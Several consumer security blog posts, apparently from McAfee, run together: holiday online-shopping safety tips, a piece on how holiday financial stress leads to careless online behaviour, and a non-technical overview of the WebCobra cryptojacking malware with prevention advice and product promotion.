No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!


The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

Holiday Stress Can Make You More Careless Online

Holiday stress. Every year, come November, my resting heart rate starts to rise: the festive season is approaching. Not only is there so much to do but there’s so much to spend money on. There are presents to purchase, feasts to prepare and party outfits to buy. Throw in a holiday to fill the long summer break, and both the credit cards and my stress levels are starting to rapidly increase!

Holiday Financial Stress Results in Poor Decision Making Online

But did you know that this stress can affect our online safety? Research conducted by McAfee shows that almost 80% of us believe the holiday period causes financial stress. And nearly half of us (46%) believe the stress of the holiday season can cause us to behave carelessly online. Risky behaviours can put our online safety at risk. For instance, using public Wi-Fi to snag a last-minute purchase. Or buying something from an unfamiliar website because it’s cheaper.

Aussie Shoppers Love an Online Bargain

In 2017, Aussies spent a record $21.3 million online – a whopping 19% increase over 2016. McAfee’s research shows that Aussie consumers love securing a bargain online – who doesn’t!! But many will seek out a great deal even if it means potentially jeopardising their online safety. The research shows that 64% of consumers are willing to use an unfamiliar website if it means they can save money on their purchase. Even more concerning, a third of Aussies admitted to clicking links in suspicious emails for better deals!! Yikes!!

The Thing Is, Cyber Criminals Love Your Holiday Shopping Too

Cyber criminals work very hard to take advantage of us during the busy Holiday season. They come up with all sorts of ingenious ways to target time-poor and budget-conscious consumers online. They know very well that many of us will cut corners with our online security. Particularly if we think we can save money on presents, outfits or even a holiday.

And they scheme accordingly: charity phishing emails, fake online stores, bogus delivery emails, e-voucher scams and more. Cyber criminals have tried and tested strategies to either steal our personal information or our identity.

How You Can Stay Safe While Shopping Online This Holiday Season

So, don’t feel like you need to battle the crowds at Westfield this festive season. You can still shop online safely if you follow a few simple steps:

  1. Connect with Caution

Public Wi-Fi is just so convenient, but it is a risky business. Users could unknowingly share their personal information with cyber criminals who are snooping on the network. So, if you absolutely have to use public Wi-Fi for a great online shopping deal, always use a Virtual Private Network (VPN) such as McAfee Safe Connect which creates a bank-grade encrypted connection.

  2. Think Before You Click

One of the easiest ways for a cyber criminal to target victims is using phishing emails to trick consumers into sharing their personal information. Phishing emails could be disguised as holiday savings or even a shopping notification. Instead of clicking on a link in an email, always check directly with the source to verify an offer or shipment.

  3. Always Shop with Security Protection

Shopping online without security protection is like driving without a seat belt – dangerous! Comprehensive antivirus software like McAfee Total Protection will help shield your devices against malware, phishing attacks and other threats. It also provides a firewall, an anti-spam function, parental controls and a password management tool. A complete no-brainer!

But this year, I’m going to commit to lowering my stress. That way I can really enjoy my time with my family and friends. To get ahead of the game I plan to:

  • Start my online shopping earlier so I don’t ‘cut corners’ with my online safety,
  • Create a realistic budget, and
  • Start filling my freezer with some holiday food – now

And most importantly, get that resting heart rate under control!!

Happy Holidays Everyone!

Alex xx

The post Holiday Stress Can Make You More Careless Online appeared first on McAfee Blogs.

Preventing WebCobra Malware From Slithering Onto Your System

Cryptocurrency mining is the way transactions are verified and added to the public ledger, a database of all the transactions made around a particular piece of cryptocurrency. Cryptocurrency miners compile all of these transactions into blocks and try to solve complicated mathematical problems to compete with other miners for bitcoins. To do this, miners need a ton of computer resources, since successful bitcoin mining requires a large amount of hardware. Unfortunately, these miners can be used for more nefarious purposes if they’re included within malicious software. Enter WebCobra, a malware that exploits victims’ computers to help cybercriminals mine for cryptocurrencies, a method also known as cryptojacking.

How does WebCobra malware work, exactly? First, WebCobra uses droppers (Trojans designed to install malware onto a victim’s device) to check the computer’s system. The droppers let the malware know which cryptocurrency miner to launch. Then, it silently slithers onto a victim’s device via a rogue PUP (potentially unwanted program) and installs one of two miners: Cryptonight or Claymore’s Zcash. Depending on the miner, it will drain the victim’s device of its computer processor’s resources or install malicious file folders that are difficult to find.

The most threatening part of WebCobra malware is that it can be very difficult to detect. Oftentimes, the only sign of its presence is decreased computer performance. Plus, when the dropper is scanning the victim’s device, it will also check for security products running on the system. Many security products use APIs, or application programming interfaces, to monitor malware behavior – and WebCobra is able to overwrite some. This means it can essentially unhook the API and disrupt the system’s communication methods, and therefore remain undetected for a long time.

While cryptocurrency mining can be a harmless hobby, users should be cautious of criminal miners with poor intentions. So, what can you do to prevent WebCobra from slithering onto your system? Check out the following tips:

  • If your computer slows down, be cautious. It can be hard to determine if your device is being used for a cryptojacking campaign. One way you can identify the attack – poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
  • Use a comprehensive security solution. Having your device infected with malware will not only slow down its performance but could potentially lead to exposed data. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection. McAfee products are confirmed to detect WebCobra.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing WebCobra Malware From Slithering Onto Your System appeared first on McAfee Blogs.